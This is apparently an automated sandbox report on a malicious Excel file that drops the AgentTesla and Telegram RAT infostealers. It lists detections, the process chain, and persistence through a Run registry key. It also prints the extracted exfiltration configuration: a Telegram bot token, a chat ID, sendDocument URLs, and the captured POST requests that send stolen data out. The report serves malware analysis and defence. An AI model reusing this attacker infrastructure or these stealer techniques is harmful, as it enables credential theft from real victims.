Edit tour

Windows Analysis Report
00001.LPCD2022.xls

Overview

General Information

Sample Name:	00001.LPCD2022.xls
Analysis ID:	605526
MD5:	eccc1d5afe2f72a48203944b1abf01a3
SHA1:	32597a76c5e04fa67b6199bc9817ebdb9e1b7f71
SHA256:	6122dce9933f03479b3d98aea0785ae26737644262ac9ee8a67cbfbf11050f13
Tags:	xls
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Yara detected AgentTesla

Yara detected AntiVM3

Document exploit detected (creates forbidden files)

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Tries to steal Mail credentials (via file / registry access)

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Creates processes via WMI

Machine Learning detection for sample

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

.NET source code contains very large array initializations

Hides that the sample has been downloaded from the Internet (zone.identifier)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Installs a global keyboard hook

Document contains an embedded VBA macro which may execute processes

Office process drops PE file

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA macro with suspicious strings

Machine Learning detection for dropped file

Document contains an embedded VBA with hexadecimal encoded strings

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Uses a known web browser user agent for HTTP communication

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Document contains an embedded VBA macro which executes code when the document is opened / closed

Yara detected Credential Stealer

Sigma detected: Excel Network Connections

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Enables debug privileges

Creates a window with clipboard capturing capabilities

Document contains embedded VBA macros

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Potential document exploit detected (performs HTTP gets)

Sigma detected: Autorun Keys Modification

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1540 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

dropped.exe (PID: 1980 cmdline: C:\Users\user\AppData\Local\Temp\dropped.exe MD5: E2D002B5319A8CE475A7F355254A67A0)

RegSvcs.exe (PID: 2260 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)

BINGO.exe (PID: 948 cmdline: "C:\Users\user\AppData\Roaming\BINGO\BINGO.exe" MD5: 62CE5EF995FD63A1847A196C2E8B267B)

BINGO.exe (PID: 2992 cmdline: "C:\Users\user\AppData\Roaming\BINGO\BINGO.exe" MD5: 62CE5EF995FD63A1847A196C2E8B267B)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "5019146869", "Chat URL": "https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000003.00000000.918357600.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000000.918357600.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000003.00000000.917821418.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000000.917821418.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000002.919772020.0000000002841000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: dropped.exe PID: 1980	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: dropped.exe PID: 1980	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: dropped.exe PID: 1980	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 2260	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 2260	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 2260	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.RegSvcs.exe.400000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.0.RegSvcs.exe.400000.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
3.0.RegSvcs.exe.400000.2.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c19:$s10: logins 0x32680:$s11: credential 0x2eba4:$g1: get_Clipboard 0x2ebb2:$g2: get_Keyboard 0x2ebbf:$g3: get_Password 0x2fea3:$g4: get_CtrlKeyDown 0x2feb3:$g5: get_ShiftKeyDown 0x2fec4:$g6: get_AltKeyDown
3.0.RegSvcs.exe.400000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.0.RegSvcs.exe.400000.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
3.0.RegSvcs.exe.400000.1.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c19:$s10: logins 0x32680:$s11: credential 0x2eba4:$g1: get_Clipboard 0x2ebb2:$g2: get_Keyboard 0x2ebbf:$g3: get_Password 0x2fea3:$g4: get_CtrlKeyDown 0x2feb3:$g5: get_ShiftKeyDown 0x2fec4:$g6: get_AltKeyDown
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c19:$s10: logins 0x32680:$s11: credential 0x2eba4:$g1: get_Clipboard 0x2ebb2:$g2: get_Keyboard 0x2ebbf:$g3: get_Password 0x2fea3:$g4: get_CtrlKeyDown 0x2feb3:$g5: get_ShiftKeyDown 0x2fec4:$g6: get_AltKeyDown
3.0.RegSvcs.exe.400000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.0.RegSvcs.exe.400000.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
3.0.RegSvcs.exe.400000.3.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c19:$s10: logins 0x32680:$s11: credential 0x2eba4:$g1: get_Clipboard 0x2ebb2:$g2: get_Keyboard 0x2ebbf:$g3: get_Password 0x2fea3:$g4: get_CtrlKeyDown 0x2feb3:$g5: get_ShiftKeyDown 0x2fec4:$g6: get_AltKeyDown
3.0.RegSvcs.exe.400000.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.0.RegSvcs.exe.400000.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
3.0.RegSvcs.exe.400000.4.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c19:$s10: logins 0x32680:$s11: credential 0x2eba4:$g1: get_Clipboard 0x2ebb2:$g2: get_Keyboard 0x2ebbf:$g3: get_Password 0x2fea3:$g4: get_CtrlKeyDown 0x2feb3:$g5: get_ShiftKeyDown 0x2fec4:$g6: get_AltKeyDown
2.2.dropped.exe.38fb8f8.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.dropped.exe.38fb8f8.8.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.dropped.exe.38fb8f8.8.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30e19:$s10: logins 0x30880:$s11: credential 0x2cda4:$g1: get_Clipboard 0x2cdb2:$g2: get_Keyboard 0x2cdbf:$g3: get_Password 0x2e0a3:$g4: get_CtrlKeyDown 0x2e0b3:$g5: get_ShiftKeyDown 0x2e0c4:$g6: get_AltKeyDown
3.0.RegSvcs.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.0.RegSvcs.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
3.0.RegSvcs.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c19:$s10: logins 0x32680:$s11: credential 0x2eba4:$g1: get_Clipboard 0x2ebb2:$g2: get_Keyboard 0x2ebbf:$g3: get_Password 0x2fea3:$g4: get_CtrlKeyDown 0x2feb3:$g5: get_ShiftKeyDown 0x2fec4:$g6: get_AltKeyDown
2.2.dropped.exe.38c70d8.10.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.dropped.exe.38c70d8.10.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.dropped.exe.38c70d8.10.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30e19:$s10: logins 0x30880:$s11: credential 0x2cda4:$g1: get_Clipboard 0x2cdb2:$g2: get_Keyboard 0x2cdbf:$g3: get_Password 0x2e0a3:$g4: get_CtrlKeyDown 0x2e0b3:$g5: get_ShiftKeyDown 0x2e0c4:$g6: get_AltKeyDown
2.2.dropped.exe.38c70d8.10.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.dropped.exe.38c70d8.10.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.dropped.exe.38c70d8.10.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c19:$s10: logins 0x67439:$s10: logins 0x9ba59:$s10: logins 0x32680:$s11: credential 0x66ea0:$s11: credential 0x9b4c0:$s11: credential 0x2eba4:$g1: get_Clipboard 0x633c4:$g1: get_Clipboard 0x979e4:$g1: get_Clipboard 0x2ebb2:$g2: get_Keyboard 0x633d2:$g2: get_Keyboard 0x979f2:$g2: get_Keyboard 0x2ebbf:$g3: get_Password 0x633df:$g3: get_Password 0x979ff:$g3: get_Password 0x2fea3:$g4: get_CtrlKeyDown 0x646c3:$g4: get_CtrlKeyDown 0x98ce3:$g4: get_CtrlKeyDown 0x2feb3:$g5: get_ShiftKeyDown 0x646d3:$g5: get_ShiftKeyDown 0x98cf3:$g5: get_ShiftKeyDown
2.2.dropped.exe.38c70d8.10.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xb30e3:$s1: file:/// 0x12a303:$s1: file:/// 0xb2ff3:$s2: {11111-22222-10009-11112} 0x12a213:$s2: {11111-22222-10009-11112} 0xb3073:$s3: {11111-22222-50001-00000} 0x12a293:$s3: {11111-22222-50001-00000} 0xb0b7a:$s4: get_Module 0x127d9a:$s4: get_Module 0x2f10d:$s5: Reverse 0x6392d:$s5: Reverse 0x97f4d:$s5: Reverse 0xb0fe9:$s5: Reverse 0x128209:$s5: Reverse 0x30fd5:$s6: BlockCopy 0x657f5:$s6: BlockCopy 0x99e15:$s6: BlockCopy 0xb2bc7:$s6: BlockCopy 0x129de7:$s6: BlockCopy 0x2f3ae:$s7: ReadByte 0x63bce:$s7: ReadByte 0x981ee:$s7: ReadByte
2.2.dropped.exe.3890ab8.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.dropped.exe.3890ab8.9.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.dropped.exe.3890ab8.9.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x69239:$s10: logins 0x9da59:$s10: logins 0xd2079:$s10: logins 0x68ca0:$s11: credential 0x9d4c0:$s11: credential 0xd1ae0:$s11: credential 0x651c4:$g1: get_Clipboard 0x999e4:$g1: get_Clipboard 0xce004:$g1: get_Clipboard 0x651d2:$g2: get_Keyboard 0x999f2:$g2: get_Keyboard 0xce012:$g2: get_Keyboard 0x651df:$g3: get_Password 0x999ff:$g3: get_Password 0xce01f:$g3: get_Password 0x664c3:$g4: get_CtrlKeyDown 0x9ace3:$g4: get_CtrlKeyDown 0xcf303:$g4: get_CtrlKeyDown 0x664d3:$g5: get_ShiftKeyDown 0x9acf3:$g5: get_ShiftKeyDown 0xcf313:$g5: get_ShiftKeyDown
2.2.dropped.exe.3890ab8.9.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xe9703:$s1: file:/// 0x160923:$s1: file:/// 0xe9613:$s2: {11111-22222-10009-11112} 0x160833:$s2: {11111-22222-10009-11112} 0xe9693:$s3: {11111-22222-50001-00000} 0x1608b3:$s3: {11111-22222-50001-00000} 0xe719a:$s4: get_Module 0x15e3ba:$s4: get_Module 0x6572d:$s5: Reverse 0x99f4d:$s5: Reverse 0xce56d:$s5: Reverse 0xe7609:$s5: Reverse 0x15e829:$s5: Reverse 0x675f5:$s6: BlockCopy 0x9be15:$s6: BlockCopy 0xd0435:$s6: BlockCopy 0xe91e7:$s6: BlockCopy 0x160407:$s6: BlockCopy 0x659ce:$s7: ReadByte 0x9a1ee:$s7: ReadByte 0xce80e:$s7: ReadByte
2.2.dropped.exe.38fb8f8.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.dropped.exe.38fb8f8.8.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.dropped.exe.38fb8f8.8.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c19:$s10: logins 0x67239:$s10: logins 0x32680:$s11: credential 0x66ca0:$s11: credential 0x2eba4:$g1: get_Clipboard 0x631c4:$g1: get_Clipboard 0x2ebb2:$g2: get_Keyboard 0x631d2:$g2: get_Keyboard 0x2ebbf:$g3: get_Password 0x631df:$g3: get_Password 0x2fea3:$g4: get_CtrlKeyDown 0x644c3:$g4: get_CtrlKeyDown 0x2feb3:$g5: get_ShiftKeyDown 0x644d3:$g5: get_ShiftKeyDown 0x2fec4:$g6: get_AltKeyDown 0x644e4:$g6: get_AltKeyDown
2.2.dropped.exe.38fb8f8.8.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x7e8c3:$s1: file:/// 0xf5ae3:$s1: file:/// 0x7e7d3:$s2: {11111-22222-10009-11112} 0xf59f3:$s2: {11111-22222-10009-11112} 0x7e853:$s3: {11111-22222-50001-00000} 0xf5a73:$s3: {11111-22222-50001-00000} 0x7c35a:$s4: get_Module 0xf357a:$s4: get_Module 0x2f10d:$s5: Reverse 0x6372d:$s5: Reverse 0x7c7c9:$s5: Reverse 0xf39e9:$s5: Reverse 0x30fd5:$s6: BlockCopy 0x655f5:$s6: BlockCopy 0x7e3a7:$s6: BlockCopy 0xf55c7:$s6: BlockCopy 0x2f3ae:$s7: ReadByte 0x639ce:$s7: ReadByte 0x7e8d5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0xf5af5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 31 entries

Sigma Signatures

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\dropped.exe, ParentImage: C:\Users\user\AppData\Local\Temp\dropped.exe, ParentProcessId: 1980, ParentProcessName: dropped.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 2260, ProcessName: RegSvcs.exe

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 144.76.136.153, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1540, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 2260, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\BINGO

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1540, TargetFilename: C:\Users\user\AppData\Local\Temp\dropped.exe

Source: Process started

Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\dropped.exe, ParentImage: C:\Users\user\AppData\Local\Temp\dropped.exe, ParentProcessId: 1980, ParentProcessName: dropped.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 2260, ProcessName: RegSvcs.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 3.2.RegSvcs.exe.400000.0.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5019146869", "Chat URL": "https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument"}
Source: dropped.exe.1980.2.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendMessage"}

Multi AV Scanner detection for submitted file

Source: 00001.LPCD2022.xls	Virustotal: Detection: 60%			Perma Link
Source: 00001.LPCD2022.xls	ReversingLabs: Detection: 60%

Antivirus / Scanner detection for submitted sample

Source: 00001.LPCD2022.xls

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\dropped.exe

ReversingLabs: Detection: 57%

Machine Learning detection for sample

Source: 00001.LPCD2022.xls

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\dropped.exe

Joe Sandbox ML: detected

Source: 3.0.RegSvcs.exe.400000.4.unpack	Avira: Label: TR/Spy.Gen8
Source: 3.0.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 3.0.RegSvcs.exe.400000.3.unpack	Avira: Label: TR/Spy.Gen8
Source: 3.0.RegSvcs.exe.400000.2.unpack	Avira: Label: TR/Spy.Gen8
Source: 3.0.RegSvcs.exe.400000.1.unpack	Avira: Label: TR/Spy.Gen8

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.22:49171 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49172 version: TLS 1.2

Source:

Binary string: RegSvcs.pdb source: BINGO.exe, BINGO.exe, 00000006.00000000.959068378.0000000000E02000.00000020.00000001.01000000.00000008.sdmp, BINGO.exe, 00000006.00000002.961292531.0000000000E02000.00000020.00000001.01000000.00000008.sdmp, BINGO.exe.3.dr

Software Vulnerabilities

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: dropped.exe.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\dropped.exe

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 144.76.136.153:443

Source: global traffic

DNS query: name: transfer.sh

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 144.76.136.153:443

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da195bfbe5defbHost: api.telegram.orgContent-Length: 1036Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da195d3e2a38cbHost: api.telegram.orgContent-Length: 5245Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da195f7a6800deHost: api.telegram.orgContent-Length: 945Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da195fc1ea40beHost: api.telegram.orgContent-Length: 108279Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da196245dad951Host: api.telegram.orgContent-Length: 112430Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da19651155316aHost: api.telegram.orgContent-Length: 112590Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da1967dccd5f5cHost: api.telegram.orgContent-Length: 112590Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da196aa84ed922Host: api.telegram.orgContent-Length: 112587Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da196f7fa188b0Host: api.telegram.orgContent-Length: 112587Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da19703f385b46Host: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da19730abb6823Host: api.telegram.orgContent-Length: 116890Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da1975d63c36dcHost: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
